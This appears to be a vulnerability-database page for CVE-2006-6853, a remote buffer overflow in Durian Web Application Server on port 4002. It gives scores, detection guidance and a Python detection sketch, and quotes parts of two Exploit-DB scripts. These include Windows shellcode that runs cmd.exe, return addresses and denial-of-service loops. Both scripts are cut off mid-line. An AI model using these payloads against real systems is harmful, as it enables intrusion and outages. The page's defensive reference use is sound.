CVE-2006-6853
Published: 2006-12-31
Priority: P3 · 53 · critical · 10 (CVSS 2.0)
CVSS vector: AV:N/AC:L/Au:N/C:C/I:C/A:C
EXPLOIT
EPSS: 8.01% (94.0th percentile)
Buffer overflow in Durian Web Application Server 3.02 freeware on Windows allows remote attackers to execute arbitrary code via a long string in a crafted packet to TCP port 4002.
Affected
1 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| mozilla | durian_web_application_server | — | — |
Detection & IOCs
bytes
\xeb\x1b\x5b\x31\xc0\x50\x31\xc0\x88\x43\x59\x53\xbb\x6d\x13\x86\x7c\xff\xd3\x31\xc0\x50\xbb\xda\xcd\x81\x7c\xff\xd3\xe8\xe0\xff\xff\xff\x63\x6d\x64\x2e\x65\x78\x65\x20\x2f\x63\x20
- Monitor for large crafted TCP packets sent to port 4002 targeting Durian Web Application Server 3.02; the exploit cycles through buffer sizes of 30, 70, 150, 330, 520, 700, 1400, and 2300 bytes using repeated byte patterns (0xaa, 0xa0, 0x41).
- Detect shellcode containing WinExec (0x7c86136d) and ExitProcess (0x7c81cdda) addresses in TCP port 4002 payloads, indicative of exploitation of CVE-2006-6853 on Windows XP/2003 targets.
- The DoS variant also targets TCP port 4002 with the same byte patterns and size array; repeated connections with oversized payloads to this port from a single source should be alerted on.
- The RCE exploit uses two different EIP values depending on whether DEP is enabled or disabled on the target; defenders should note both return addresses when writing signatures.
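The checks in the list above, sketched as an added example (not code from this page or its sources): it inspects reassembled TCP payloads bound for port 4002 for the two hard-coded API addresses and for long runs of the filler bytes, then reports sources that trip the check repeatedly. The function names, the 30-byte minimum run, the three-hit threshold and the sample events are assumptions made for illustration.

```python
import struct

DURIAN_PORT = 4002
# API addresses named on the page, in the little-endian form they take on the wire.
API_ADDRS = {
    "WinExec": struct.pack("<I", 0x7C86136D),
    "ExitProcess": struct.pack("<I", 0x7C81CDDA),
}
FILL_BYTES = (0xAA, 0xA0, 0x41)
MIN_RUN = 30  # assumption: smallest buffer size in the page's size list

def longest_fill_run(payload):
    """Return (byte, length) of the longest run of one filler byte."""
    best, i = (None, 0), 0
    while i < len(payload):
        j = i
        while j < len(payload) and payload[j] == payload[i]:
            j += 1
        if payload[i] in FILL_BYTES and j - i > best[1]:
            best = (payload[i], j - i)
        i = j
    return best

def inspect_payload(dst_port, payload):
    """Return the reasons a payload looks suspicious; an empty list if none."""
    if dst_port != DURIAN_PORT:
        return []
    reasons = [f"hardcoded {name} address"
               for name, raw in API_ADDRS.items() if raw in payload]
    byte, run = longest_fill_run(payload)
    if run >= MIN_RUN:
        reasons.append(f"{run}-byte run of 0x{byte:02x}")
    return reasons

def sources_to_alert(events, threshold=3):
    """events: (src_ip, dst_port, payload) tuples. threshold is an assumed tuning value."""
    hits = {}
    for src, port, payload in events:
        if inspect_payload(port, payload):
            hits[src] = hits.get(src, 0) + 1
    return sorted(src for src, n in hits.items() if n >= threshold)

# Constructed sample events: documentation IP ranges, synthetic payloads.
SAMPLE_EVENTS = [
    ("198.51.100.7", 4002, b"\xaa" * 150),
    ("198.51.100.7", 4002, b"\x41" * 700),
    ("198.51.100.7", 4002, b"\xa0" * 330 + API_ADDRS["WinExec"] + b"\x00" * 8),
    ("203.0.113.9", 4002, b"HELLO 1.0\r\n"),
    ("203.0.113.9", 80, b"\x41" * 2300),
]
```

A 30-byte run of 0x41 can occur in legitimate traffic, so the run check is best treated as a scoring signal and the address match as the high-confidence one.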
No detection rules found.
Exploit-DB
Durian Web Application Server 3.02 - Remote Buffer Overflow
exploitdb·2006-12-29
---
http://sourceforge.net/projects/durian/
*/
error_reporting(E_ALL);
$address = "192.168.1.3";
$service_port = "4002";
$shellcode =
"\xeb\x1b".
"\x5b".
"\x31\xc0".
"\x50".
"\x31\xc0".
"\x88\x43\x59".
"\x53".
"\xbb\x6d\x13\x86\x7c". //WinExec, 0x7c86136d
"\xff\xd3".
"\x31\xc0".
"\x50".
"\xbb\xda\xcd\x81\x7c". //ExitProcess, 0x7c81cdda
"\xff\xd3".
"\xe8\xe0\xff\xff\xff".
"\x63\x6d\x64".
"\x2e".
"\x65".
"\x78\x65".
"\x20\x2f".
"\x63\x20".
"cmd.exe /c start notepad & ";
//$eip="\x72\xe0\xf1\x00";//DEP disabled
$eip="\x72\xe0\xf2\x00";
$ch =array("\xaa","\xa0","\x41");
$size=array(30,70,150,330,520,700,1400,2300);
for ($j=0; $j
# milw0rm.com [2006-12-29]
Exploit-DB
Durian Web Application Server 3.02 - Denial of Service
exploitdb·2006-12-29
---
http://sourceforge.net/projects/durian/
//by rgod mail: retrog at alice dot it site: http://retrogod.altervista.org
error_reporting(E_ALL);
$service_port = "4002";
$address = "192.168.1.3";
$ch =array("\xaa","\xa0","\x41");
$size=array(30,70,150,330,520,700,1400,2300);
$c=1000;
for ($m=1; $m
# milw0rm.com [2006-12-29]
No writeups or analysis indexed.
- http://securitytracker.com/id?1017456
- http://www.securityfocus.com/bid/21808
- https://exchange.xforce.ibmcloud.com/vulnerabilities/31161
- https://www.exploit-db.com/exploits/3037
- https://www.exploit-db.com/exploits/3038

Published: 2006-12-31